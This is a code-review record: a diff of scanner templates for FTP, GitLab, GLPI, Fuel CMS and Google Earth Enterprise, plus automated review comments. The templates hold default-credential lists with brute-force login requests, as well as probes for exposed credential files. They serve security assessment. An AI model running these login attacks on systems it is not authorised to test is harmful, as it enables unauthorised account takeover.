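Review bot: The re-added ftp-credentials-exposure.yaml rates an exposed `ftpsync.settings` file as `severity: medium`. The copy deleted in the same commit rated it `high`, with a CVSS 7.5 vector (`C:H`) and a description. Both match on the same FTPSync configuration keys, so the downgrade looks like a side effect of syncing an older revision rather than a reassessment. Use `severity: high` and restore `description: FTP credentials were detected.` together with the `classification` block.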
@@ -1,43 +0,0 @@ -id: ftp-weak-credentials - -info: - name: FTP Service - Credential Weakness - author: pussycat0x - severity: high - description: An FTP service was accessed with easily guessed credentials. - reference: - - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ - classification: - cvss-score: 8.5 - cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N - tags: network,ftp,default-login,service - -network: - - - inputs: - - data: "USER {{username}}\r\nPASS {{password}}\r\n" - - host: - - "{{Hostname}}" - - "{{Host}}:21" - - attack: clusterbomb - payloads: - username: - - admin - - root - password: - - password - - toor - - nas - - guest - - default - - pass1 - - stingray - - matchers: - - type: word - words: - - "230 Login successful" - -# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/ftp-weak-credentials.yaml b/poc/auth/ftp-weak-credentials.yaml index 88e28af4e4..a81c1773d3 100644 --- a/poc/auth/ftp-weak-credentials.yaml +++ b/poc/auth/ftp-weak-credentials.yaml @@ -1,15 +1,28 @@ id: ftp-weak-credentials + info: - name: FTP Service with weak credentials + name: FTP Service - Credential Weakness author: pussycat0x - severity: critical + severity: high + description: An FTP service was accessed with easily guessed credentials. + reference: + - https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/ + classification: + cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N + cvss-score: 8.5 + metadata: + max-request: 1 tags: network,ftp,default-login,service -network: + +tcp: + - inputs: - data: "USER {{username}}\r\nPASS {{password}}\r\n" + host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 + attack: clusterbomb payloads: username: 
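Review bot: In ftp-weak-credentials.yaml, `cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N` lacks the `CVSS:` prefix that the other vectors on this page carry, so a strict vector parser will reject it. Write `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N`. `max-request: 1` also looks too low for an `attack: clusterbomb` template: the deleted -7570 copy lists two usernames and seven passwords, which is fourteen logins per host if this file keeps the same lists. The payload lists continue outside this hunk, so confirm the count before setting the value.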
@@ -23,7 +36,9 @@ network: - default - pass1 - stingray + matchers: - type: word words: - "230 Login successful" +# digest: 4a0a0047304502210091443984db463385943f03987aba6dc71b402521fe000709f10ef889b8513bad0220404de36585bc13279c4c256e013fcd8125eacf1b882f564130ca8007abd74220:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/auth/fuelcms-default-login-7571.yaml b/poc/auth/fuelcms-default-login-7571.yaml index 9a64ca8b8c..c46140539c 100644 --- a/poc/auth/fuelcms-default-login-7571.yaml +++ b/poc/auth/fuelcms-default-login-7571.yaml @@ -1,33 +1,34 @@ id: fuelcms-default-login + info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: fuelcms,default-login,oss + requests: - raw: - | GET /fuel/login HTTP/1.1 Host: {{Hostname}} + - | POST /fuel/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} + attack: pitchfork payloads: username: - admin password: - admin + cookie-reuse: true matchers-condition: and matchers: @@ -35,13 +36,16 @@ requests: part: header words: - "/fuel/dashboard" + - type: regex part: header regex: - 'fuel_(.*)=' + - type: status status: - 302 + extractors: - type: regex part: body @@ -50,5 +54,3 @@ requests: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/fuelcms-default-login-7572.yaml b/poc/auth/fuelcms-default-login-7572.yaml index 823352d52f..e2940c8be6 100644 --- a/poc/auth/fuelcms-default-login-7572.yaml +++ b/poc/auth/fuelcms-default-login-7572.yaml 
@@ -1,21 +1,13 @@ id: fuelcms-default-login - info: - name: Fuel CMS - Default Admin Discovery + name: Fuel CMS Default Credentials author: Adam Crosser severity: high description: Fuel CMS default admin credentials were discovered. reference: - https://docs.getfuelcms.com/general/security - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 2 tags: fuelcms,default-login,oss - -http: +requests: - raw: - | GET /fuel/login HTTP/1.1 @@ -26,30 +18,26 @@ http: Content-Type: application/x-www-form-urlencoded user_name={{username}}&password={{password}}&Login=Login&forward=&ci_csrf_token_FUEL={{csrftoken}} - attack: pitchfork payloads: username: - admin password: - admin - + cookie-reuse: true matchers-condition: and matchers: - type: word part: header words: - "/fuel/dashboard" - - type: regex part: header regex: - 'fuel_(.*)=' - - type: status status: - 302 - extractors: - type: regex part: body @@ -58,5 +46,3 @@ http: group: 1 regex: - 'id="ci_csrf_token_FUEL" value="([0-9a-z]+)" \/>' - -# digest: 490a0046304402206823cbd53bbf104095e4720a47b17ec31c319f5a9386bae411fb2b06bf60a45b02205744e27cd6385cf0b20fd329c19cbbaab2a4fb9019a71fe6d701461937b6147c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/general-tokens-7580.yaml b/poc/auth/general-tokens-7580.yaml index 695d2dc6e9..6ade1f3cd0 100644 --- a/poc/auth/general-tokens-7580.yaml +++ b/poc/auth/general-tokens-7580.yaml @@ -1,16 +1,13 @@ id: generic-tokens - info: name: Generic Tokens author: nadino,geeknik severity: info - tags: exposure,token - + tags: exposure,token,generic requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: dsl 
@@ -21,16 +18,16 @@ requests: - regex("SECRET[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("AUTHORIZATION[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - regex("PASSWORD[\\-|_|A-Z0-9]*(\'|\")?(:|=)(\'|\")?[\\-|_|A-Z0-9]{10}",replace(toupper(body),"","")) - - type: regex part: body regex: - - '(K|k)ey([U|u]p|[D|d]own|[P|p]ress)' - - '(K|k)eyboard(N|n)avigation' - - '[P|p]assword([E|e]mail[N|n]ot[F|f]ound[M|m]essage|[L|l]abel|[E|e]rror[M|m]essage|[M|m]essage)' + - '(?i)key(sinternal|up|down|press|boardnavigation|words?|board|ebrow|board_fill|_retry_interval|_fetched|_expiresat|board_shortcuts|s_close|s_previous|s_next|s_zoom|s_play_pause)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' + - '(?i)(!native)|(.*keybindings)' + - '(?i)(layout|a)key' + - '(?i)token_expires_in' condition: or negative: true - extractors: - type: regex part: body diff --git a/poc/auth/general-tokens-7583.yaml b/poc/auth/general-tokens-7583.yaml index 1da7b52968..75770dc589 100644 --- a/poc/auth/general-tokens-7583.yaml +++ b/poc/auth/general-tokens-7583.yaml @@ -4,11 +4,9 @@ info: name: Generic Tokens author: nadino,geeknik severity: unknown - metadata: - max-request: 1 tags: exposure,token,generic -http: +requests: - method: GET path: - '{{BaseURL}}' 
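Review bot: The new exclusion patterns in general-tokens-7580.yaml are unanchored and apply to the whole body, so one innocuous substring suppresses every real hit on the same page. `'(?i)(layout|a)key'` matches inside words such as `datakey`, and `'(?i)(!native)|(.*keybindings)'` matches any body containing `keybindings`. The matcher is `negative: true` with `condition: or` under `matchers-condition: and`, so a response holding a leaked secret plus one of these strings yields no finding. If the intent is the standalone tokens, anchor them, e.g. `'(?i)\b(layout|a)key\b'` and `'(?i)\bkeybindings\b'`. The matchers block starts outside this hunk.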
@@ -46,5 +44,3 @@ http: - (S|s)(E|e)(C|c)(R|r)(E|e)(T|t)[\-|_|A-Za-z0-9]*(\''|")?( )*(:|=)()*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - (A|a)(U|u)(T|t)(H|h)(O|o)(R|r)(I|i)(Z|z)(A|a)(T|t)(I|i)(O|o)(N|n)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - (P|p)(A|a)(S|s)(S|s)(W|w)(O|o)(R|r)(D|d)[\-|_|A-Za-z0-9]*(\''|")?()*(:|=)( )*(\''|")?[ 0-9A-Za-z\-_]+(\''|")? - -# digest: 490a0046304402203c58511d5729bfedb3b68adb70f728097898b6ebe49f2d9e2dddd4e1daee42870220505cfaabc1e278cb67776ed8731e2314fb51b31848ba409e0f3d47e43322fcda:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/git-credentials-disclosure-7641.yaml b/poc/auth/git-credentials-disclosure-7641.yaml new file mode 100644 index 0000000000..c6a97b6f21 --- /dev/null +++ b/poc/auth/git-credentials-disclosure-7641.yaml @@ -0,0 +1,32 @@ +id: git-credentials-disclosure + +info: + name: Git Credentials Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/git-credentials-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/.git-credentials" + + matchers-condition: and + matchers: + + - type: word + words: + - "https://" + - "@github.com" + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + negative: true \ No newline at end of file diff --git a/poc/auth/git-credentials-disclosure-7640.yaml b/poc/auth/git-credentials-disclosure.yaml similarity index 100% rename from poc/auth/git-credentials-disclosure-7640.yaml rename to poc/auth/git-credentials-disclosure.yaml diff --git a/poc/auth/gitea-login.yaml b/poc/auth/gitea-login.yaml index b816d38bce..f5309e300a 100644 --- a/poc/auth/gitea-login.yaml +++ b/poc/auth/gitea-login.yaml 
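Review bot: The word matcher in git-credentials-disclosure-7641.yaml requires `@github.com`, so a `.git-credentials` file that stores logins for any other Git host is not reported. `https://` and `@github.com` are also checked as independent words, so a non-HTML 200 body containing a URL and an address such as `noreply@github.com` matches as well. Match the credential-store line format rather than one host, for example `- type: regex` with `regex:` / `- 'https?://[^/\s:]+:[^/\s@]+@[^/\s]+'`. Keep the negative `text/html` header check.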
@@ -1,21 +1,26 @@ id: gitea-login info: - name: Gitea Login + name: Gitea Login Panel - Detect author: dhiyaneshDK severity: info + description: Gitea login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: html:"Powered by Gitea Version" tags: gitea,panel -requests: +http: - method: GET path: - '{{BaseURL}}/user/login' matchers-condition: and matchers: - - type: word words: - 'Powered by Gitea Version' @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# digest: 490a00463044022038fc5b03251fb7a538eff2928f385d8c84d83dbf731ce2b3b92cd21ebae1f863022032055fbaa66217e4844ab3103cd581a5d7816f31f3ed4cea7c45e0fd7ec813e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-public-signup-7683.yaml b/poc/auth/gitlab-public-signup-7683.yaml deleted file mode 100644 index 93da1f1bfc..0000000000 --- a/poc/auth/gitlab-public-signup-7683.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: gitlab-public-signup -info: - name: GitLab public signup - author: pdteam - severity: info - tags: gitlab,misconfig -requests: - - method: GET - path: - - "{{BaseURL}}/users/sign_in" - matchers-condition: and - matchers: - - type: word - words: - - '<a data-qa-selector="register_link" href="/users/sign_up">Register now</a>' - - 'data-qa-selector="new_user_register_button"' - - type: word - words: - - 'https://about.gitlab.com' - - type: status - status: - - 200 - - type: word - negative: true - words: - - '<meta content="GitLab.com" property="og:description">' diff --git a/poc/auth/gitlab-uninitialized-password-7694.yaml b/poc/auth/gitlab-uninitialized-password-7694.yaml index 0dcd636704..a6cdfee354 100644 --- a/poc/auth/gitlab-uninitialized-password-7694.yaml +++ b/poc/auth/gitlab-uninitialized-password-7694.yaml @@ -1,4 +1,5 @@ id: gitlab-uninitialized-password + info: name: Uninitialized GitLab instances author: GitLab Red Team 
@@ -7,17 +8,19 @@ info: Prior to version 14, GitLab installations required a root password to be set via the web UI. If the administrator skipped this step, any visitor could set a password and control the instance. + metadata: + shodan-query: http.title:"GitLab" reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/211328 - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password - metadata: - shodan-query: http.title:"GitLab" tags: gitlab,misconfig,unauth + requests: - method: GET path: - "{{BaseURL}}/users/sign_in" + redirects: true max-redirects: 2 matchers-condition: and @@ -29,10 +32,12 @@ requests: - 'New password' - 'Confirm new password' condition: and + - type: word part: header words: - 'gitlab_session' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/auth/gitlab-uninitialized-password-7695.yaml b/poc/auth/gitlab-uninitialized-password-7695.yaml index 9e37ead70a..35926f1858 100644 --- a/poc/auth/gitlab-uninitialized-password-7695.yaml +++ b/poc/auth/gitlab-uninitialized-password-7695.yaml @@ -13,16 +13,18 @@ info: - https://gitlab.com/gitlab-org/omnibus-gitlab/-/merge_requests/5331 - https://docs.gitlab.com/omnibus/installation/#set-up-the-initial-password metadata: + max-request: 1 shodan-query: http.title:"GitLab" tags: gitlab,misconfig,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/users/sign_in" - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -40,4 +42,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a004630440220255ddce1efef9c0c73f9b9e061ba0fac5010742090aaaaf8ef59cfd9f6d2a9f902204c29bbc43dbf8feb4e409ff27a27d2bde04ee07b042eef88e82a61217cbf4ffc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-weak-login-7707.yaml b/poc/auth/gitlab-weak-login-7707.yaml index b9e97461ce..7fb809fb41 100644 
--- a/poc/auth/gitlab-weak-login-7707.yaml +++ b/poc/auth/gitlab-weak-login-7707.yaml @@ -5,16 +5,17 @@ info: author: Suman_Kar,dwisiswant0 severity: high description: Gitlab default login credentials were discovered. - tags: gitlab,default-login reference: - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab - metadata: - shodan-query: http.title:"GitLab" classification: cwe-id: CWE-798 + metadata: + max-request: 6 + shodan-query: http.title:"GitLab" + tags: gitlab,default-login -requests: +http: - raw: - | POST /oauth/token HTTP/1.1 @@ -31,7 +32,6 @@ requests: - "root" - "admin" - "admin@local.host" - password: - "5iveL!fe" - "123456789" @@ -55,4 +55,4 @@ requests: - '"refresh_token":' condition: and -# Enhanced by mp on 2022/03/03 +# digest: 490a00463044022046b016d8df18dcff00ce41916e0870b3f20c707fc3edd900dbf9897898a41c0d022048a9aeebcf2906096985bd0cadec4bafd6bfa5dd5b3bbd959b1d3c5b0eb4186e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gitlab-weak-login.yaml b/poc/auth/gitlab-weak-login.yaml deleted file mode 100644 index c2bc176084..0000000000 --- a/poc/auth/gitlab-weak-login.yaml +++ /dev/null 
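Review bot: gitlab-weak-login-7707.yaml carries no note about account lockout between `tags:` and `http:`. The only place that caveat was written down is the comment in gitlab-weak-login.yaml (`# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user.`), which this commit deletes. With `attack: clusterbomb` over three usernames and two passwords (`max-request: 6`) the template stays under that limit today, but a longer password list could lock real accounts on the instances being assessed. Carry the comment over above `http:` and add `# keep the password list at 4 entries or fewer per username`.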
@@ -1,56 +0,0 @@ -id: gitlab-weak-login - -info: - name: Gitlab Weak Login - author: Suman_Kar,dwisiswant0 - severity: high - tags: gitlab,default-login - reference: - - https://twitter.com/0xmahmoudJo0/status/1467394090685943809 - - https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab - metadata: - shodan-query: http.title:"GitLab" - -# Gitlab blocks for 10 minutes after 5 "Invalid" attempts for valid user. -# So make sure, not to attempt more than 4 password for same valid user. - -requests: - - raw: - - | - POST /oauth/token HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Referer: {{BaseURL}} - content-type: application/json - - {"grant_type":"password","username":"{{username}}","password":"{{password}}"} - - attack: clusterbomb - payloads: - username: - - "root" - - "admin" - - "admin@local.host" - - password: - - "5iveL!fe" - - "123456789" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - application/json - - - type: word - part: body - words: - - '"access_token":' - - '"token_type":' - - '"refresh_token":' - condition: and \ No newline at end of file diff --git a/poc/auth/gloo-unauth-7722.yaml b/poc/auth/gloo-unauth-7722.yaml index 13346551df..c94f1721c5 100644 --- a/poc/auth/gloo-unauth-7722.yaml +++ b/poc/auth/gloo-unauth-7722.yaml 
@@ -1,27 +1,36 @@ id: gloo-unauth + info: name: Unauthenticated Gloo UI author: dhiyaneshDk severity: high + metadata: + max-request: 1 tags: unauth,gloo -requests: + +http: - method: GET path: - '{{BaseURL}}/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails' + headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-type: "application/grpc-web+proto" Referer: "{{BaseURL}}/admin/" + matchers-condition: and matchers: - type: word words: - "gke-remote" part: body + - type: word words: - "application/grpc-web+proto" part: header + - type: status status: - 200 + +# digest: 490a00463044022038a63398e0213e8c14e3835e8719afa5d37310c49f3d229fd3f4ee36af7972c202201810220865a8a667e649b44d48815c274a522cd21e532e7c5122f176b65d5541:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/glpi-authentication-7730.yaml b/poc/auth/glpi-authentication-7730.yaml deleted file mode 100644 index 96d6634fba..0000000000 --- a/poc/auth/glpi-authentication-7730.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: glpi-authentication - -info: - name: GLPI - Authentication - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"GLPI - Authentication" - tags: panel,auth,glpi - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - '<title>GLPI - Authentication' - - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright' - - - type: status - status: - - 200 diff --git a/poc/auth/glpi-default-login-7732.yaml b/poc/auth/glpi-default-login-7732.yaml index f47f8cd39f..e411c10039 100644 --- a/poc/auth/glpi-default-login-7732.yaml +++ b/poc/auth/glpi-default-login-7732.yaml @@ -1,5 +1,4 @@ id: glpi-default-login - info: name: GLPI Default Login author: andysvints @@ -9,11 +8,8 @@ info: - https://glpi-project.org/ classification: cwe-id: CWE-798 - metadata: - max-request: 2 tags: glpi,default-login - -http: +requests: - raw: - | GET / HTTP/1.1 
@@ -26,14 +22,12 @@ http: Referer: {{BaseURL}} {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} - attack: pitchfork payloads: user: - glpi pass: - glpi - extractors: - type: regex name: token @@ -42,7 +36,6 @@ http: group: 1 regex: - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" - - type: regex name: name part: body @@ -50,7 +43,6 @@ http: group: 1 regex: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - - type: regex name: password part: body @@ -58,15 +50,14 @@ http: group: 1 regex: - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" - + cookie-reuse: true matchers-condition: and matchers: - type: word words: - 'GLPI - Standard Interface' - - type: status status: - 200 -# digest: 4a0a004730450220756b6e508614433a3afccdcb206aec79b10478a9a3d45b32fc7ec1f2041d35fc022100adb763989b06d6b42d49bd02003348f3b6412a27b13f2cadbd999770d03eeef2:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/03 diff --git a/poc/auth/glpi-default-login.yaml b/poc/auth/glpi-default-login.yaml new file mode 100644 index 0000000000..c2ea4c26d7 --- /dev/null +++ b/poc/auth/glpi-default-login.yaml 
@@ -0,0 +1,67 @@ +id: glpi-default-login + +info: + name: GLPI Default Login + author: andysvints + severity: high + tags: glpi,default-login + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. + reference: https://glpi-project.org/ + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /front/login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + {{name}}={{user}}&{{password}}={{pass}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} + + attack: pitchfork + payloads: + user: + - glpi + pass: + - glpi + + extractors: + - type: regex + name: token + part: body + internal: true + group: 1 + regex: + - "hidden\" name=\"_glpi_csrf_token\" value=\"([0-9a-z]+)\"" + + - type: regex + name: name + part: body + internal: true + group: 1 + regex: + - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" + + - type: regex + name: password + part: body + internal: true + group: 1 + regex: + - "type=\"password\" name=\"([0-9a-z]+)\" id=\"login_password\" required=\"required\"" + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - 'GLPI - Standard Interface' + + - type: status + status: + - 200 diff --git a/poc/auth/gmail-api-client-secrets-7741.yaml b/poc/auth/gmail-api-client-secrets-7741.yaml deleted file mode 100644 index 72f7d06ecc..0000000000 --- a/poc/auth/gmail-api-client-secrets-7741.yaml +++ /dev/null 
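Review bot: The new glpi-default-login.yaml reuses `id: glpi-default-login`, the same id as glpi-default-login-7732.yaml, which this commit keeps and edits. A run over `poc/auth/` then carries two templates with one id, both submitting glpi/glpi to `/front/login.php`. Depending on how the engine treats duplicate ids, that means either a silently skipped file or two login attempts and two findings per target. Keep a single copy, and make sure it carries the `classification: cwe-id: CWE-798` block that 7732 has and this file lacks.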
@@ -1,40 +0,0 @@ -id: gmail-api-client-secrets - -info: - name: GMail API - Detect - author: geeknik - severity: info - description: GMail API was detected. - reference: https://developers.google.com/gmail/api/auth/web-server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/client_secrets.json" - - matchers-condition: and - matchers: - - type: word - words: - - "client_id" - - "auth_uri" - - "token_uri" - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - -# digest: 4a0a00473045022100e423f2d50edff69e6eb1b5bc47e8f482b97de447024a3623818e28a08199321a02207f96b638e3b21026d86306511d783491c0cc00d9484b54499fe7cfea40baead3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/gocd-encryption-key.yaml b/poc/auth/gocd-encryption-key.yaml index 80d0ed8b6b..6674be53bf 100644 --- a/poc/auth/gocd-encryption-key.yaml +++ b/poc/auth/gocd-encryption-key.yaml @@ -8,18 +8,18 @@ info: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - tags: go,gocd,exposure,misconfig metadata: + max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + tags: go,gocd,exposure,misconfig -requests: +http: - method: GET path: - "{{BaseURL}}/go/add-on/business-continuity/api/cipher.aes" matchers-condition: and matchers: - - type: status status: - 200 @@ -37,3 +37,5 @@ requests: - type: regex regex: - "([a-z0-9]){32}" + +# digest: 4a0a0047304502207a374f4a3d53295089b3f257924253bb945aa90f49139de42d8595900d58d4d002210096aec8d919f4c6ce4fdcf29c487409d9091a7fe7d990df2d4954ee040f056bcf:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/google-api-key-7768.yaml b/poc/auth/google-api-key-7768.yaml index 87d61eaa24..1d863c0dbe 100644 --- a/poc/auth/google-api-key-7768.yaml +++ b/poc/auth/google-api-key-7768.yaml @@ -1,23 +1,16 @@ id: google-api-key - info: name: Google API Key author: Swissky severity: info - metadata: - max-request: 2 tags: exposure,token,google - -http: +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/hopfully404" - extractors: - type: regex part: body regex: - "AIza[0-9A-Za-z\\-_]{35}" - -# digest: 4a0a004730450221008529a1cf21d244ce3327f73d3d68a4e1afc76d0dab02130fa43f449db87fb51802200b6b4d64369e56d8ebba8796e30b0cee88ca1318014c35dee345905fffdb4a3c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/google-earth-dlogin-7781.yaml b/poc/auth/google-earth-dlogin-7781.yaml new file mode 100644 index 0000000000..37152d2e45 --- /dev/null +++ b/poc/auth/google-earth-dlogin-7781.yaml @@ -0,0 +1,31 @@ +id: google-earth-dlogin +info: + name: Google Earth Enterprise Default Login + author: orpheus,johnjhacking + severity: high + tags: default-login,google + reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + metadata: + shodan-dork: 'title:"GEE Server"' +requests: + - raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + username: + - geapacheuser + password: + - geeadmin + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - 'DashboardPanel' + - 'Earth Enterprise Server' diff --git a/poc/auth/google-earth-dlogin.yaml b/poc/auth/google-earth-dlogin.yaml index 37152d2e45..7b88681c7f 100644 --- a/poc/auth/google-earth-dlogin.yaml +++ b/poc/auth/google-earth-dlogin.yaml 
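Review bot: `google-earth-dlogin-7781.yaml` is added with the metadata key `shodan-dork` and without a `description`, although the hunk for `google-earth-dlogin.yaml` in the next file section of this commit renames that key and adds the description to what appears to be the same template. Use `shodan-query: 'title:"GEE Server"'` here as well and carry the description over. Alternatively drop this numbered copy, so that two files sharing `id: google-earth-dlogin` cannot drift apart.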
@@ -3,10 +3,19 @@ info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking severity: high - tags: default-login,google - reference: https://www.opengee.org/geedocs/5.2.2/answer/3470759.html + description: Google Earth Enterprise default login credentials were discovered. + remediation: "To reset the username and password: sudo /opt/google/gehttpd/bin/htpasswd -c /opt/google/gehttpd/conf.d/.htpasswd geapacheuse" + tags: default-login,google-earth + reference: + - https://johnjhacking.com/blog/gee-exploitation/ + - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html metadata: - shodan-dork: 'title:"GEE Server"' + shodan-query: 'title:"GEE Server"' + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -29,3 +38,5 @@ requests: words: - 'DashboardPanel' - 'Earth Enterprise Server' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/facebook-secrets.yaml b/poc/auth/google-secrets.yaml similarity index 100% rename from poc/auth/facebook-secrets.yaml rename to poc/auth/google-secrets.yaml diff --git a/poc/auth/gophish-default-login-7792.yaml b/poc/auth/gophish-default-login-7792.yaml index 9b2b924bb1..51c95010f1 100644 --- a/poc/auth/gophish-default-login-7792.yaml +++ b/poc/auth/gophish-default-login-7792.yaml @@ -1,10 +1,18 @@ id: gophish-default-login info: - name: Gophish < v0.10.1 default credentials + name: Gophish < v0.10.1 Default Credentials author: arcc,dhiyaneshDK severity: high tags: gophish,default-login + description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary. + reference: + - https://docs.getgophish.com/user-guide/getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: 
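Review bot: The added `remediation` line in `google-earth-dlogin.yaml` ends in `geapacheuse`, but the account this check logs in with is `geapacheuser` (see the `username` payload in `google-earth-dlogin-7781.yaml`), so an operator pasting the command sets a password for the wrong account name. The line should end `/opt/google/gehttpd/conf.d/.htpasswd geapacheuser`. The text should also say that `htpasswd -c` rewrites the file, which drops any other accounts stored in it. The empty `cve-id:` key under `classification` carries no value and can be removed.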
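Review bot: The `description` added to `gophish-default-login-7792.yaml` only talks about versions newer than 0.10.1, while the template name says it targets Gophish < v0.10.1, so the text never states what a match means. Something like `description: Gophish before v0.10.1 accepts a well-known default administrator login; later versions print a temporary administrator password to the logs on first start.` covers both cases. The empty `cve-id:` key can be dropped. The `requests:` block continues outside this hunk.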
